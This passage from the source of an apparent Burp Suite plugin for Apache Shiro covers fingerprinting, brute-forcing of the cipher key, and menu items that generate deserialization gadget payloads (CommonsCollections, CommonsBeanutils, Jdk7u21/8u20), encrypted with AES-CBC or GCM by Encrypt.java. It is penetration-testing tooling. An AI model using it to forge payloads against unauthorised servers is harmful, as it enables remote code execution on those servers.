224 | // shiro指纹检测-控制台报告输出
225 | shiroFingerprint.run().consoleExport();
226 |
227 | // shiro指纹检测-报告输出
228 | issues.add(shiroFingerprint.run().export());
229 |
230 | // 添加任务到面板中等待检测
231 | int tagId = this.tags.getScanQueueTagClass().add(
232 | "",
233 | "",
234 | this.helpers.analyzeRequest(baseRequestResponse).getMethod(),
235 | baseBurpUrl.getHttpRequestUrl().toString(),
236 | this.helpers.analyzeResponse(baseRequestResponse.getResponse()).getStatusCode() + "",
237 | "waiting for test results",
238 | baseRequestResponse
239 | );
240 |
241 | try {
242 | // shiro加密key扩展
243 | Boolean isStartShiroCipherKeyExtension = this.yamlReader.getBoolean("application.shiroCipherKeyExtension.config.isStart");
244 | Boolean isScanCbcEncrypt = this.yamlReader.getBoolean("application.shiroCipherKeyExtension.config.isScanCbcEncrypt");
245 | Boolean isScanGcmEncrypt = this.yamlReader.getBoolean("application.shiroCipherKeyExtension.config.isScanGcmEncrypt");
246 | if (isStartShiroCipherKeyExtension && (isScanCbcEncrypt || isScanGcmEncrypt)) {
247 | // 启动线程跑shiro加密key扩展任务
248 | String callClassName = this.yamlReader.getString("application.shiroCipherKeyExtension.config.provider");
249 | ShiroCipherKeyThread shiroCipherKeyThread = new ShiroCipherKeyThread(
250 | this.globalVariableReader,
251 | globalPassiveScanVariableReader,
252 | this.callbacks,
253 | this.yamlReader,
254 | baseRequestResponse,
255 | shiroFingerprint,
256 | callClassName);
257 |
258 | // 监控线程
259 | while (true) {
260 | if (shiroCipherKeyThread.isTaskComplete()) {
261 | break;
262 | }
263 |
264 | // 单纯的等待~
265 | Thread.sleep(500);
266 | }
267 |
268 | // 尝试获取shiro加密key扩展的数据
269 | // 注意: 只有成功爆破出shiro加密key了才会有数据
270 | IShiroCipherKeyExtension shiroCipherKey = globalPassiveScanVariableReader.getShiroCipherKeyExtensionData("shiroCipherKey");
271 |
272 | // 为空的时候,表示没有成功爆破出shiro加密key
273 | if (shiroCipherKey == null) {
274 | // 未检查出来key-更新任务状态至任务栏面板
275 | this.tags.getScanQueueTagClass().save(
276 | tagId,
277 | "",
278 | "",
279 | this.helpers.analyzeRequest(baseRequestResponse).getMethod(),
280 | baseBurpUrl.getHttpRequestUrl().toString(),
281 | this.helpers.analyzeResponse(baseRequestResponse.getResponse()).getStatusCode() + "",
282 | "[-] not found shiro key",
283 | baseRequestResponse);
284 | return issues;
285 | }
286 |
287 | // 检查出来key-更新任务状态至任务栏面板
288 | IHttpRequestResponse shiroCipherKeyRequestResponse = shiroCipherKey.getHttpRequestResponse();
289 | this.tags.getScanQueueTagClass().save(
290 | tagId,
291 | shiroCipherKey.getExtensionName(),
292 | shiroCipherKey.getEncryptMethod(),
293 | this.helpers.analyzeRequest(shiroCipherKeyRequestResponse).getMethod(),
294 | baseBurpUrl.getHttpRequestUrl().toString(),
295 | this.helpers.analyzeResponse(shiroCipherKeyRequestResponse.getResponse()).getStatusCode() + "",
296 | "[+] found shiro key:" + shiroCipherKey.getCipherKey(),
297 | shiroCipherKeyRequestResponse);
298 |
299 | // shiro加密key-控制台报告输出
300 | shiroCipherKey.consoleExport();
301 |
302 | // shiro加密key-报告输出
303 | issues.add(shiroCipherKey.export());
304 | } else {
305 | this.tags.getScanQueueTagClass().save(
306 | tagId,
307 | "",
308 | "",
309 | this.helpers.analyzeRequest(shiroFingerprint.run().getHttpRequestResponse()).getMethod(),
310 | baseBurpUrl.getHttpRequestUrl().toString(),
311 | this.helpers.analyzeResponse(shiroFingerprint.run().getHttpRequestResponse().getResponse()).getStatusCode() + "",
312 | "[*] shiro fingerprint",
313 | shiroFingerprint.run().getHttpRequestResponse());
314 | }
315 |
316 | URL httpRequestUrl = baseBurpUrl.getHttpRequestUrl();
317 | this.stdout.println("============shiro-key扫描完毕================");
318 | this.stdout.println(String.format("url: %s", httpRequestUrl));
319 | this.stdout.println("========================================");
320 | } catch (Exception e) {
321 | // 判断是否有shiro指纹,输出到问题面板过
322 | // 如果有,那么爆致命错误的时候就可以删除issues变量的数据
323 | // 防止因为因为跑key一直错误,间接导致站点指纹数量满了
324 | String shiroFingerprintIssueName = this.yamlReader.getString("application.shiroFingerprintExtension.config.issueName");
325 | Integer shiroFingerprintIssueNumber = this.getSiteIssueNumber(baseBurpUrl.getRequestDomainName(), shiroFingerprintIssueName);
326 | if (shiroFingerprintIssueNumber >= 1 && issues.size() >= 1) {
327 | issues.remove(0);
328 | }
329 |
330 | this.stdout.println("========插件错误-未知错误============");
331 | this.stdout.println(String.format("url: %s", baseBurpUrl.getHttpRequestUrl().toString()));
332 | this.stdout.println("请使用该url重新访问,若是还多次出现此错误,则很有可能waf拦截");
333 | this.stdout.println("错误详情请查看Extender里面对应插件的Errors标签页");
334 | this.stdout.println("========================================");
335 | this.stdout.println(" ");
336 |
337 | this.tags.getScanQueueTagClass().save(
338 | tagId,
339 | "",
340 | "",
341 | this.helpers.analyzeRequest(baseRequestResponse).getMethod(),
342 | baseBurpUrl.getHttpRequestUrl().toString(),
343 | this.helpers.analyzeResponse(baseRequestResponse.getResponse()).getStatusCode() + "",
344 | "[x] unknown error",
345 | baseRequestResponse);
346 |
347 | e.printStackTrace(this.stderr);
348 | }
349 |
350 | return issues;
351 | }
352 |
353 | @Override
354 | public List doActiveScan(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint) {
355 | return null;
356 | }
357 |
358 | @Override
359 | public int consolidateDuplicateIssues(IScanIssue existingIssue, IScanIssue newIssue) {
360 | return 0;
361 | }
362 |
363 | @Override
364 | public void extensionUnloaded() {
365 | this.globalVariableReader.putBooleanData("isExtensionUnload", true);
366 | }
367 |
368 | /**
369 | * 判断是否查找的到指定的域名
370 | *
371 | * @param domainName 需匹配的域名
372 | * @param domainNameList 待匹配的域名列表
373 | * @return
374 | */
375 | private static Boolean isMatchDomainName(String domainName, List domainNameList) {
376 | domainName = domainName.trim();
377 |
378 | if (domainName.length() <= 0) {
379 | return false;
380 | }
381 |
382 | if (domainNameList == null || domainNameList.size() <= 0) {
383 | return false;
384 | }
385 |
386 | if (domainName.contains(":")) {
387 | domainName = domainName.substring(0, domainName.indexOf(":"));
388 | }
389 |
390 | String reverseDomainName = new StringBuffer(domainName).reverse().toString();
391 |
392 | for (String domainName2 : domainNameList) {
393 | domainName2 = domainName2.trim();
394 |
395 | if (domainName2.length() <= 0) {
396 | continue;
397 | }
398 |
399 | if (domainName2.contains(":")) {
400 | domainName2 = domainName2.substring(0, domainName2.indexOf(":"));
401 | }
402 |
403 | String reverseDomainName2 = new StringBuffer(domainName2).reverse().toString();
404 |
405 | if (domainName.equals(domainName2)) {
406 | return true;
407 | }
408 |
409 | if (reverseDomainName.contains(".") && reverseDomainName2.contains(".")) {
410 | List splitDomainName = new ArrayList(Arrays.asList(reverseDomainName.split("[.]")));
411 |
412 | List splitDomainName2 = new ArrayList(Arrays.asList(reverseDomainName2.split("[.]")));
413 |
414 | if (splitDomainName.size() <= 0 || splitDomainName2.size() <= 0) {
415 | continue;
416 | }
417 |
418 | if (splitDomainName.size() < splitDomainName2.size()) {
419 | for (int i = splitDomainName.size(); i < splitDomainName2.size(); i++) {
420 | splitDomainName.add("*");
421 | }
422 | }
423 |
424 | if (splitDomainName.size() > splitDomainName2.size()) {
425 | for (int i = splitDomainName2.size(); i < splitDomainName.size(); i++) {
426 | splitDomainName2.add("*");
427 | }
428 | }
429 |
430 | int ii = 0;
431 | for (int i = 0; i < splitDomainName.size(); i++) {
432 | if (splitDomainName2.get(i).equals("*")) {
433 | ii = ii + 1;
434 | } else if (splitDomainName.get(i).equals(splitDomainName2.get(i))) {
435 | ii = ii + 1;
436 | }
437 | }
438 |
439 | if (ii == splitDomainName.size()) {
440 | return true;
441 | }
442 | }
443 | }
444 | return false;
445 | }
446 |
447 | /**
448 | * 判断是否url黑名单后缀
449 | * 大小写不区分
450 | * 是 = true, 否 = false
451 | *
452 | * @param burpUrl
453 | * @return
454 | */
455 | private boolean isUrlBlackListSuffix(CustomBurpUrl burpUrl) {
456 | if (!this.yamlReader.getBoolean("urlBlackListSuffix.config.isStart")) {
457 | return false;
458 | }
459 |
460 | String noParameterUrl = burpUrl.getHttpRequestUrl().toString().split("\\?")[0];
461 | String urlSuffix = noParameterUrl.substring(noParameterUrl.lastIndexOf(".") + 1);
462 |
463 | List suffixList = this.yamlReader.getStringList("urlBlackListSuffix.suffixList");
464 | if (suffixList == null || suffixList.size() == 0) {
465 | return false;
466 | }
467 |
468 | for (String s : suffixList) {
469 | if (s.toLowerCase().equals(urlSuffix.toLowerCase())) {
470 | return true;
471 | }
472 | }
473 |
474 | return false;
475 | }
476 |
477 | /**
478 | * 网站问题数量
479 | *
480 | * @param domainName 请求域名名称
481 | * @param issueName 要查询的问题名称
482 | * @return
483 | */
484 | private Integer getSiteIssueNumber(String domainName, String issueName) {
485 | Integer number = 0;
486 |
487 | for (IScanIssue Issue : this.callbacks.getScanIssues(domainName)) {
488 | if (Issue.getIssueName().equals(issueName)) {
489 | number++;
490 | }
491 | }
492 |
493 | return number;
494 | }
495 |
496 | /**
497 | * 站点出现数量
498 | *
499 | * @param domainName
500 | * @return
501 | */
502 | private Integer getSiteNumber(String domainName) {
503 | Integer number = 0;
504 | for (IHttpRequestResponse requestResponse : this.callbacks.getSiteMap(domainName)) {
505 | number++;
506 | }
507 | return number;
508 | }
509 | }
510 |
--------------------------------------------------------------------------------
/src/main/java/burp/Config.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | public class Config {
4 | private static Integer mode = 0;
5 | private static String key = "";
6 |
7 | public static Integer getMode() {
8 | String val = BurpExtender.callbacks.loadExtensionSetting("mode");
9 | try {
10 | return Integer.valueOf(val);
11 | }catch (Exception e) {
12 | return Config.mode;
13 | }
14 | }
15 |
16 | public static void setMode(Integer mode) {
17 | BurpExtender.callbacks.saveExtensionSetting("fuzz_number", String.valueOf(mode));
18 | Config.mode = mode;
19 | }
20 |
21 | public static String getKey() {
22 | String val = BurpExtender.callbacks.loadExtensionSetting("key");
23 | try {
24 | return String.valueOf(val);
25 | }catch (Exception e) {
26 | return Config.key;
27 | }
28 | }
29 |
30 | public static void setKey(String key) {
31 | BurpExtender.callbacks.saveExtensionSetting("key", String.valueOf(key));
32 | Config.key = key;
33 | }
34 | }
35 |
--------------------------------------------------------------------------------
/src/main/java/burp/ConfigDlg.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | import javax.swing.*;
4 | import java.awt.*;
5 | import java.awt.event.ActionEvent;
6 | import java.awt.event.ActionListener;
7 |
8 | public class ConfigDlg extends JDialog {
9 | //定义组件
10 | private final JPanel mainPanel = new JPanel();
11 | private final JPanel toPanel = new JPanel();
12 | private final JPanel centerPanel = new JPanel();
13 | private final JPanel bottomPanel = new JPanel();;
14 | private final JComboBox mode= new JComboBox(new String[]{"AES-CBC", "AES-GCM"});
15 | private final JTextField key = new JTextField(18);
16 | private final JButton btSave = new JButton("保存");
17 |
18 | public ConfigDlg() {
19 | initGUI();
20 | initEvent();
21 | initValue();
22 | this.setTitle("设置");
23 | }
24 |
25 | private void initGUI() {
26 | toPanel.setLayout(new FlowLayout(FlowLayout.LEFT));
27 | toPanel.add(new JLabel("加密模式:"));
28 | toPanel.add(mode);
29 |
30 | centerPanel.setLayout(new FlowLayout(FlowLayout.LEFT));
31 | centerPanel.add(new JLabel("key:"));
32 | key.setFont(new Font(null, Font.PLAIN, 13));
33 | centerPanel.add(key);
34 |
35 | bottomPanel.setLayout(new FlowLayout(FlowLayout.CENTER));
36 | bottomPanel.add(btSave);
37 | btSave.setToolTipText("Hey Bro!这是保存");
38 |
39 | mainPanel.setLayout(new BorderLayout());
40 | mainPanel.add(toPanel,BorderLayout.NORTH);
41 | mainPanel.add(centerPanel,BorderLayout.CENTER);
42 | mainPanel.add(bottomPanel,BorderLayout.SOUTH);
43 |
44 | this.setModal(true);
45 | this.setDefaultCloseOperation(WindowConstants.DISPOSE_ON_CLOSE);
46 | this.add(mainPanel);
47 | //使配置窗口自动适应控件大小,防止部分控件无法显示
48 | this.pack();
49 | //居中显示配置窗口
50 | Dimension screensize=Toolkit.getDefaultToolkit().getScreenSize();
51 | this.setBounds(screensize.width/2-this.getWidth()/2,screensize.height/2-this.getHeight()/2,this.getWidth(),this.getHeight());
52 | }
53 | //组件的事件响应
54 | private void initEvent() {
55 | //保存按钮
56 | btSave.addActionListener(new ActionListener() {
57 | @Override
58 | public void actionPerformed(ActionEvent e) {
59 | Integer modeSelect = mode.getSelectedIndex();
60 | String keyValue = key.getText();
61 |
62 | //mode 0是CBC模式 1是GCM模式
63 | System.out.println("mode:" + modeSelect);
64 | System.out.println("key:" + keyValue);
65 |
66 | Config.setMode(modeSelect);
67 | Config.setKey(keyValue);
68 | ConfigDlg.this.dispose();
69 | }
70 | });
71 | }
72 | //为控件赋值
73 | public void initValue() {
74 | mode.setSelectedIndex(Config.getMode());
75 | key.setText(Config.getKey());
76 | }
77 | }
78 |
--------------------------------------------------------------------------------
/src/main/java/burp/CustomErrorException/DiffPageException.java:
--------------------------------------------------------------------------------
1 | package burp.CustomErrorException;
2 |
3 | public class DiffPageException extends RuntimeException {
4 | public DiffPageException() {
5 | super();
6 | }
7 |
8 | public DiffPageException(String message, Throwable cause) {
9 | super(message, cause);
10 | }
11 |
12 | public DiffPageException(String message) {
13 | super(message);
14 | }
15 |
16 | public DiffPageException(Throwable cause) {
17 | super(cause);
18 | }
19 | }
--------------------------------------------------------------------------------
/src/main/java/burp/CustomErrorException/TaskTimeoutException.java:
--------------------------------------------------------------------------------
1 | package burp.CustomErrorException;
2 |
3 | public class TaskTimeoutException extends RuntimeException {
4 | public TaskTimeoutException() {
5 | super();
6 | }
7 |
8 | public TaskTimeoutException(String message, Throwable cause) {
9 | super(message, cause);
10 | }
11 |
12 | public TaskTimeoutException(String message) {
13 | super(message);
14 | }
15 |
16 | public TaskTimeoutException(Throwable cause) {
17 | super(cause);
18 | }
19 | }
--------------------------------------------------------------------------------
/src/main/java/burp/CustomScanIssue.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | import java.net.URL;
4 |
5 | public class CustomScanIssue implements IScanIssue {
6 | private URL url;
7 | private String issueName;
8 | private int issueType;
9 | private String severity;
10 | private String confidence;
11 | private String issueBackground;
12 | private String remediationBackground;
13 | private String issueDetail;
14 | private String remediationDetail;
15 | private IHttpRequestResponse[] httpMessages;
16 | private IHttpService httpService;
17 |
18 | public CustomScanIssue(
19 | URL url,
20 | String issueName,
21 | int issueType,
22 | String severity,
23 | String confidence,
24 | String issueBackground,
25 | String remediationBackground,
26 | String issueDetail,
27 | String remediationDetail,
28 | IHttpRequestResponse[] httpMessages,
29 | IHttpService httpService) {
30 | this.url = url;
31 | this.issueName = issueName;
32 | this.issueType = issueType;
33 | this.severity = severity;
34 | this.confidence = confidence;
35 | this.issueBackground = issueBackground;
36 | this.remediationBackground = remediationBackground;
37 | this.issueDetail = issueDetail;
38 | this.remediationDetail = remediationDetail;
39 | this.httpMessages = httpMessages;
40 | this.httpService = httpService;
41 | }
42 |
43 | @Override
44 | public URL getUrl() {
45 | return this.url;
46 | }
47 |
48 | @Override
49 | public String getIssueName() {
50 | return this.issueName;
51 | }
52 |
53 | @Override
54 | public int getIssueType() {
55 | return this.issueType;
56 | }
57 |
58 | @Override
59 | public String getSeverity() {
60 | return this.severity;
61 | }
62 |
63 | @Override
64 | public String getConfidence() {
65 | return this.confidence;
66 | }
67 |
68 | @Override
69 | public String getIssueBackground() {
70 | return this.issueBackground;
71 | }
72 |
73 | @Override
74 | public String getRemediationBackground() {
75 | return this.remediationBackground;
76 | }
77 |
78 | @Override
79 | public String getIssueDetail() {
80 | return this.issueDetail;
81 | }
82 |
83 | @Override
84 | public String getRemediationDetail() {
85 | return this.remediationDetail;
86 | }
87 |
88 | @Override
89 | public IHttpRequestResponse[] getHttpMessages() {
90 | return this.httpMessages;
91 | }
92 |
93 | @Override
94 | public IHttpService getHttpService() {
95 | return this.httpService;
96 | }
97 | }
--------------------------------------------------------------------------------
/src/main/java/burp/Encrypt.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | import org.apache.shiro.codec.Base64;
4 | import org.apache.shiro.crypto.AesCipherService;
5 | import org.apache.shiro.util.ByteSource;
6 |
7 | import javax.crypto.Cipher;
8 | import javax.crypto.spec.GCMParameterSpec;
9 | import javax.crypto.spec.SecretKeySpec;
10 | import java.io.ByteArrayOutputStream;
11 | import java.io.IOException;
12 | import java.io.ObjectOutputStream;
13 | import java.security.NoSuchAlgorithmException;
14 | import java.security.SecureRandom;
15 |
16 | public class Encrypt {
17 |
18 | public static byte[] getBytes(Object obj) throws IOException {
19 | ByteArrayOutputStream byteArrayOutputStream = null;
20 | ObjectOutputStream objectOutputStream = null;
21 | byteArrayOutputStream = new ByteArrayOutputStream();
22 | objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
23 | objectOutputStream.writeObject(obj);
24 | objectOutputStream.flush();
25 | return byteArrayOutputStream.toByteArray();
26 | }
27 |
28 | public String cbc(String key, byte[] objectBytes) {
29 | Base64 B64 = new Base64();
30 | byte[] keyDecode = B64.decode(key);
31 | AesCipherService cipherService = new AesCipherService();
32 | ByteSource byteSource = cipherService.encrypt(objectBytes, keyDecode);
33 | byte[] value = byteSource.getBytes();
34 | return new String(B64.encode(value));
35 | }
36 |
37 | public String gcm(String key, byte[] payload) {
38 | try {
39 | byte[] raw = Base64.decode(key);
40 | byte[] ivs = generateInitializationVector();
41 | SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
42 | Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
43 | GCMParameterSpec iv = new GCMParameterSpec(128, ivs);
44 | cipher.init(1, skeySpec, iv);
45 | byte[] encrypted = cipher.doFinal(pad(payload));
46 | return new String(Base64.encode(byteMerger(ivs, encrypted)));
47 | } catch (Exception exception) {
48 | return "0";
49 | }
50 | }
51 |
52 | private static SecureRandom secureRandom;
53 |
54 | private static int initializationVectorSize = 128;
55 |
56 | private static byte[] pad(byte[] s) {
57 | s = byteMerger(s, charToByte((char)(16 - s.length % 16)));
58 | return s;
59 | }
60 |
61 | private static byte[] charToByte(char c) {
62 | byte[] b = new byte[2];
63 | b[0] = (byte)((c & 0xFF00) >> 8);
64 | b[1] = (byte)(c & 0xFF);
65 | return b;
66 | }
67 |
68 | private static byte[] byteMerger(byte[] bt1, byte[] bt2) {
69 | byte[] bt3 = new byte[bt1.length + bt2.length];
70 | System.arraycopy(bt1, 0, bt3, 0, bt1.length);
71 | System.arraycopy(bt2, 0, bt3, bt1.length, bt2.length);
72 | return bt3;
73 | }
74 |
75 | private static byte[] generateInitializationVector() {
76 | int size = getInitializationVectorSize();
77 | int sizeInBytes = size / 8;
78 | byte[] ivBytes = new byte[sizeInBytes];
79 | SecureRandom random = ensureSecureRandom();
80 | random.nextBytes(ivBytes);
81 | return ivBytes;
82 | }
83 |
84 | private static SecureRandom ensureSecureRandom() {
85 | SecureRandom random = getSecureRandom();
86 | if (random == null)
87 | random = getDefaultSecureRandom();
88 | return random;
89 | }
90 |
91 | private static SecureRandom getSecureRandom() {
92 | return secureRandom;
93 | }
94 |
95 | private static SecureRandom getDefaultSecureRandom() {
96 | try {
97 | return SecureRandom.getInstance("SHA1PRNG");
98 | } catch (NoSuchAlgorithmException e) {
99 | return new SecureRandom();
100 | }
101 | }
102 |
103 | private static int getInitializationVectorSize() {
104 | return initializationVectorSize;
105 | }
106 | }
107 |
--------------------------------------------------------------------------------
/src/main/java/burp/Menu.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | import javax.swing.*;
4 | import java.awt.event.ActionEvent;
5 | import java.awt.event.ActionListener;
6 | import java.util.ArrayList;
7 | import java.util.List;
8 |
9 | public class Menu implements IContextMenuFactory {
10 |
11 | @Override
12 | public List createMenuItems(final IContextMenuInvocation invocation) {
13 | final List menuList = new ArrayList<>();
14 |
15 | JMenu shiroMenu = new JMenu("Generate");
16 | final JMenuItem k1 = new JMenuItem("CommonsCollectionsK1");
17 | final JMenuItem k2 = new JMenuItem("CommonsCollectionsK2");
18 | final JMenuItem cb1 = new JMenuItem("CommonsBeanutils1");
19 | final JMenuItem cb2 = new JMenuItem("CommonsBeanutils2");
20 | final JMenuItem Jdk7u21 = new JMenuItem("Jdk7u21");
21 | final JMenuItem Jdk8u20 = new JMenuItem("Jdk8u20");
22 | final JMenuItem config = new JMenuItem("Config");
23 |
24 | k1.addActionListener(new ActionListener() {
25 | @Override
26 | public void actionPerformed(ActionEvent e) {
27 | try {
28 | Utils.xrayGadgets("k1", invocation);
29 | } catch (Exception exception) {
30 | exception.printStackTrace();
31 | }
32 | }
33 | });
34 |
35 | k2.addActionListener(new ActionListener() {
36 | @Override
37 | public void actionPerformed(ActionEvent e) {
38 | try {
39 | Utils.xrayGadgets("k2", invocation);
40 | } catch (Exception exception) {
41 | exception.printStackTrace();
42 | }
43 | }
44 | });
45 |
46 | cb1.addActionListener(new ActionListener() {
47 | @Override
48 | public void actionPerformed(ActionEvent e) {
49 | try {
50 | Utils.xrayGadgets("cb1", invocation);
51 | } catch (Exception exception) {
52 | exception.printStackTrace();
53 | }
54 | }
55 | });
56 |
57 | cb2.addActionListener(new ActionListener() {
58 | @Override
59 | public void actionPerformed(ActionEvent e) {
60 | try {
61 | Utils.xrayGadgets("cb2", invocation);
62 | } catch (Exception exception) {
63 | exception.printStackTrace();
64 | }
65 | }
66 | });
67 |
68 | Jdk7u21.addActionListener(new ActionListener() {
69 | @Override
70 | public void actionPerformed(ActionEvent e) {
71 | try {
72 | Utils.xrayGadgets("Jdk7u21", invocation);
73 | } catch (Exception exception) {
74 | exception.printStackTrace();
75 | }
76 | }
77 | });
78 |
79 | Jdk8u20.addActionListener(new ActionListener() {
80 | @Override
81 | public void actionPerformed(ActionEvent e) {
82 | try {
83 | Utils.xrayGadgets("Jdk8u20", invocation);
84 | } catch (Exception exception) {
85 | exception.printStackTrace();
86 | }
87 | }
88 | });
89 |
90 | config.addActionListener(new ActionListener() {
91 | @Override
92 | public void actionPerformed(ActionEvent e) {
93 | ConfigDlg dlg = new ConfigDlg();
94 | BurpExtender.callbacks.customizeUiComponent(dlg);
95 | dlg.setVisible(true);
96 | }
97 | });
98 |
99 |
100 | shiroMenu.add(k1);
101 | shiroMenu.add(k2);
102 | shiroMenu.add(cb1);
103 | shiroMenu.add(cb2);
104 | shiroMenu.add(Jdk7u21);
105 | shiroMenu.add(Jdk8u20);
106 | shiroMenu.add(config);
107 |
108 | menuList.add(shiroMenu);
109 | return menuList;
110 | }
111 | }
112 |
--------------------------------------------------------------------------------
/src/main/java/burp/Ui/BaseSettingTag.java:
--------------------------------------------------------------------------------
1 | package burp.Ui;
2 |
3 | import java.awt.*;
4 | import javax.swing.*;
5 |
6 | import burp.IBurpExtenderCallbacks;
7 | import burp.Bootstrap.YamlReader;
8 |
9 | public class BaseSettingTag {
10 | private YamlReader yamlReader;
11 |
12 | private JCheckBox isStartBox;
13 |
14 | public BaseSettingTag(IBurpExtenderCallbacks callbacks, JTabbedPane tabs, YamlReader yamlReader) {
15 | JPanel baseSetting = new JPanel(new GridBagLayout());
16 | GridBagConstraints c = new GridBagConstraints();
17 | this.yamlReader = yamlReader;
18 |
19 | this.input1_1(baseSetting, c);
20 | this.input1_2(baseSetting, c);
21 |
22 | tabs.addTab("基本设置", baseSetting);
23 | }
24 |
25 | private void input1_1(JPanel baseSetting, GridBagConstraints c) {
26 | JLabel br_lbl_1_1 = new JLabel("基础设置");
27 | br_lbl_1_1.setForeground(new Color(255, 89, 18));
28 | br_lbl_1_1.setFont(new Font("Serif", Font.PLAIN, br_lbl_1_1.getFont().getSize() + 2));
29 | c.insets = new Insets(5, 5, 5, 5);
30 | c.gridx = 0;
31 | c.gridy = 1;
32 | baseSetting.add(br_lbl_1_1, c);
33 | }
34 |
35 | private void input1_2(JPanel baseSetting, GridBagConstraints c) {
36 | this.isStartBox = new JCheckBox("插件-启动", this.yamlReader.getBoolean("isStart"));
37 | this.isStartBox.setFont(new Font("Serif", Font.PLAIN, this.isStartBox.getFont().getSize()));
38 | c.insets = new Insets(5, 5, 5, 5);
39 | c.gridx = 0;
40 | c.gridy = 2;
41 | baseSetting.add(this.isStartBox, c);
42 | }
43 |
44 | public Boolean isStart() {
45 | return this.isStartBox.isSelected();
46 | }
47 | }
--------------------------------------------------------------------------------
/src/main/java/burp/Ui/ScanQueueTag.java:
--------------------------------------------------------------------------------
1 | package burp.Ui;
2 |
3 | import java.awt.*;
4 | import java.text.SimpleDateFormat;
5 | import java.util.ArrayList;
6 | import java.util.Date;
7 | import java.util.List;
8 | import javax.swing.*;
9 | import javax.swing.table.AbstractTableModel;
10 | import javax.swing.table.TableModel;
11 |
12 | import burp.*;
13 |
14 | public class ScanQueueTag extends AbstractTableModel implements IMessageEditorController {
15 |
16 | private JSplitPane mjSplitPane;
17 | private List Udatas = new ArrayList();
18 | private IMessageEditor HRequestTextEditor;
19 | private IMessageEditor HResponseTextEditor;
20 | private IHttpRequestResponse currentlyDisplayedItem;
21 | private ScanQueueTag.URLTable Utable;
22 | private JScrollPane UscrollPane;
23 | private JSplitPane HjSplitPane;
24 | private JTabbedPane Ltable;
25 | private JTabbedPane Rtable;
26 |
27 | public ScanQueueTag(IBurpExtenderCallbacks callbacks, JTabbedPane tabs) {
28 | JPanel scanQueue = new JPanel(new BorderLayout());
29 |
30 | // 主分隔面板
31 | mjSplitPane = new JSplitPane(JSplitPane.VERTICAL_SPLIT);
32 |
33 | // 任务栏面板
34 | Utable = new ScanQueueTag.URLTable(ScanQueueTag.this);
35 | UscrollPane = new JScrollPane(Utable);
36 |
37 | // 请求与响应界面的分隔面板规则
38 | HjSplitPane = new JSplitPane();
39 | HjSplitPane.setResizeWeight(0.5);
40 |
41 | // 请求的面板
42 | Ltable = new JTabbedPane();
43 | HRequestTextEditor = callbacks.createMessageEditor(ScanQueueTag.this, false);
44 | Ltable.addTab("Request", HRequestTextEditor.getComponent());
45 |
46 | // 响应的面板
47 | Rtable = new JTabbedPane();
48 | HResponseTextEditor = callbacks.createMessageEditor(ScanQueueTag.this, false);
49 | Rtable.addTab("Response", HResponseTextEditor.getComponent());
50 |
51 | // 自定义程序UI组件
52 | HjSplitPane.add(Ltable, "left");
53 | HjSplitPane.add(Rtable, "right");
54 |
55 | mjSplitPane.add(UscrollPane, "left");
56 | mjSplitPane.add(HjSplitPane, "right");
57 |
58 | scanQueue.add(mjSplitPane);
59 | tabs.addTab("扫描队列", scanQueue);
60 | }
61 |
62 | @Override
63 | public IHttpService getHttpService() {
64 | return currentlyDisplayedItem.getHttpService();
65 | }
66 |
67 | @Override
68 | public byte[] getRequest() {
69 | return currentlyDisplayedItem.getRequest();
70 | }
71 |
72 | @Override
73 | public byte[] getResponse() {
74 | return currentlyDisplayedItem.getResponse();
75 | }
76 |
77 | @Override
78 | public int getRowCount() {
79 | return this.Udatas.size();
80 | }
81 |
82 | @Override
83 | public int getColumnCount() {
84 | return 9;
85 | }
86 |
87 | @Override
88 | public String getColumnName(int columnIndex) {
89 | switch (columnIndex) {
90 | case 0:
91 | return "#";
92 | case 1:
93 | return "extensionMethod";
94 | case 2:
95 | return "encryptMethod";
96 | case 3:
97 | return "requestMethod";
98 | case 4:
99 | return "url";
100 | case 5:
101 | return "statusCode";
102 | case 6:
103 | return "issue";
104 | case 7:
105 | return "startTime";
106 | case 8:
107 | return "endTime";
108 | }
109 | return null;
110 | }
111 |
112 | @Override
113 | public Class getColumnClass(int columnIndex) {
114 | return String.class;
115 | }
116 |
117 | @Override
118 | public Object getValueAt(int rowIndex, int columnIndex) {
119 | ScanQueueTag.TablesData datas = this.Udatas.get(rowIndex);
120 | switch (columnIndex) {
121 | case 0:
122 | return datas.id;
123 | case 1:
124 | return datas.extensionMethod;
125 | case 2:
126 | return datas.encryptMethod;
127 | case 3:
128 | return datas.requestMethod;
129 | case 4:
130 | return datas.url;
131 | case 5:
132 | return datas.statusCode;
133 | case 6:
134 | return datas.issue;
135 | case 7:
136 | return datas.startTime;
137 | case 8:
138 | return datas.endTime;
139 | }
140 | return null;
141 | }
142 |
143 | /**
144 | * 新增任务至任务栏面板
145 | *
146 | * @param extensionMethod
147 | * @param encryptMethod
148 | * @param requestMethod
149 | * @param url
150 | * @param statusCode
151 | * @param issue
152 | * @param requestResponse
153 | * @return int id
154 | */
155 | public int add(String extensionMethod, String encryptMethod, String requestMethod,
156 | String url, String statusCode, String issue,
157 | IHttpRequestResponse requestResponse) {
158 | synchronized (this.Udatas) {
159 | Date d = new Date();
160 | SimpleDateFormat sdf = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
161 | String startTime = sdf.format(d);
162 |
163 | int id = this.Udatas.size();
164 | this.Udatas.add(
165 | new TablesData(
166 | id,
167 | extensionMethod,
168 | encryptMethod,
169 | requestMethod,
170 | url,
171 | statusCode,
172 | issue,
173 | startTime,
174 | "",
175 | requestResponse
176 | )
177 | );
178 | fireTableRowsInserted(id, id);
179 | return id;
180 | }
181 | }
182 |
183 | /**
184 | * 更新任务状态至任务栏面板
185 | *
186 | * @param id
187 | * @param extensionMethod
188 | * @param encryptMethod
189 | * @param requestMethod
190 | * @param url
191 | * @param statusCode
192 | * @param issue
193 | * @param requestResponse
194 | * @return int id
195 | */
196 | public int save(int id, String extensionMethod, String encryptMethod,
197 | String requestMethod, String url, String statusCode,
198 | String issue, IHttpRequestResponse requestResponse) {
199 | ScanQueueTag.TablesData dataEntry = ScanQueueTag.this.Udatas.get(id);
200 | String startTime = dataEntry.startTime;
201 |
202 | Date d = new Date();
